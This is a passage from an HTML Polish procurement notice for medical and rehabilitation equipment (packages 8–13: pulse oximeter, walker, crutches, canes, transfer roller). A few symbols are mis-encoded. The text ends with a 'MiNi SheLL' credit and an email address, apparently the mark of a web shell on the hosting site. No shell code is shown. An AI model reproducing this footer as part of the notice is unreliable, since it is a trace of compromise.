<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 8
L.p.	Nazwa 	Ilość
1	Pulsoksymetr - obszerny ekran dostosowany do przekazywania personelowi monitorującemu maksimum informacji o pacjencie, 24 godzinne trendy dostępne na ekranie, zaznaczanie zdarzeń oraz histogram. Proste i zrozumiałe wiadomości pozwalające na szybkie rozpoznanie problemów lub sytuacji alarmowych. Zaprojektowany z możliwością  dostosowania do każdego przypadku klinicznego.
Zasada działania- absorcja światła czerwonego i podczerwonego.
SpO2:
- zakres: 0-100%,
- dokładność: 80-100% ? 2 % (odchylenie standardowe),
- uśrednienie: do wyboru przez użytkownika 2 lub 8 sekund,
- audio: wysokość tonu pulsu związana z wartością ? SpO2.
Tętno:
- zakres: 30-250 ud. min.,
- dokładność: ? 1% pełnej skali,
- rozdzielczość: 1 ud. min.,
- uśrednienie: 8 sekundowe.
Czujniki:
- Y- Sensor wielokrotnego użytku      ( możliwość sterylizacji i stosowania u innych pacjentów) oraz wielorazowy czujnik na palec dla dorosłych i dzieci.
Alarmy:
- granice automatyczne i regulowane dla SpO2 i tętna,
- głośność audio regulowana,             2 minuty, cisza lub wyłączenie OFF,
- wizualnie: migające cyfry przy przekroczeniu limitów.
Komunikaty: brak czujnika SpO2, brak pacjenta, za słaby sygnał, słabe prześwietlenie, światło z zewnątrz, puls poza zakresem, czujnik uszkodzony, monitor niesprawny.
Obraz: matryca punktowa, ekran               o zmiennej katodzie (CCD)                       o wymiarach 12,7 x 3,08 cm.
Graficzny Trend/Histogram: pamięć 24 godz. zasilane dodatkowo                    z akumulatora.
Łącze wyjściowe - RS232 interfejs oprogramowania komputerowego NovaCard
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi       	1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 9
L.p.	Nazwa 	Ilość
1	Zestaw do badań antropometrycznych 
z oceną zawartości tłuszczu i wody spełniająca wymagania Narodowego Funduszu Zdrowia przeznaczona do świadczenia usług  w Por. Medycyny Sportowej.
* Czas reakcji serwisu od momentu zgłoszenia usterki wynosi       	1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 10
L.p.	Nazwa 	Ilość
1	Stolik zabiegowy wykonany z rurek stalowych pokrytych powłoką niklowo -chromową,  posiadający dwie tace wykonane ze stali nierdzewnej. Całość osadzona na kółkach jezdnych umożliwiająca łatwe i ciche przemieszczania stolika w dowolne miejsce.	2 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.60.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 11
L.p.	Nazwa 	Ilość
1	Balkonik dwukołowy do nauki chodzenia (sprzęt pomocniczo - rehabilitacyjny przeznaczony do poruszania się osób starszych, niepełnosprawnych mających problemy z utrzymaniem równowagi: do asekuracji podczas chodzenia).
Opis:
 - wykonany z aluminium, 
- waga nie więcej niż 2,5 kg,
- estetyczny wygląd,
- maksymalne obciążenie do 127 kg, 
- regulowany: zakres regulacji wysokości od 508 do 880 mm,
- składany, łatwy w transporcie 	2 szt.
2	Kula łokciowa - z jednym punktem podparcia zakończonym nasadką               z tworzywa sztucznego, uchwytem           i podparciem przedramienia stałym. Wykonana z elementów metalowych łączonych z tworzywami sztucznymi. Regulacja skokowa wysokości co 2,5 cm, co pozwala na korzystanie z nich użytkownikom o wzroście od 155 do 185 cm. Kolor dowolny.	2 szt.
3	Laska ergonomiczna do prawej lub lewej ręki - waga: 0,25 kg, wytrzymałość: 120 kg. Posiadająca jeden punkt podparcia zakończony nasadką z tworzywa sztucznego. Wykonana z elementów metalowych łączonych z tworzywem sztucznym. Możliwość skokowa regulacji wysokości, co pozwala na korzystanie z nich użytkownikom o wzroście od 155 do 185 cm.	2 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.54.00-0, 33.19.60.00-0, 33.14.17.10-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 12
L.p.	Nazwa 	Ilość
1	Linka do ćwiczeń samowspomaganych kończyn górnych  225 cm.
	1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.60.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> ZAKUP I DOSTAWĘ URZĄDZEŃ I AKCESORIÓW MEDYCZNYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 13 
L.p.	Nazwa 	Ilość
1	Urządzenie służące do ułatwiania w przemieszczaniu pacjenta. Składające się z 11 rolek o średnicy 25 mm połączonych na końcach. Rolki owinięte taśmą laminową. Dł. 80 cm, szer. 32 cm, wys. 2,5 cm.
	1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.60.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com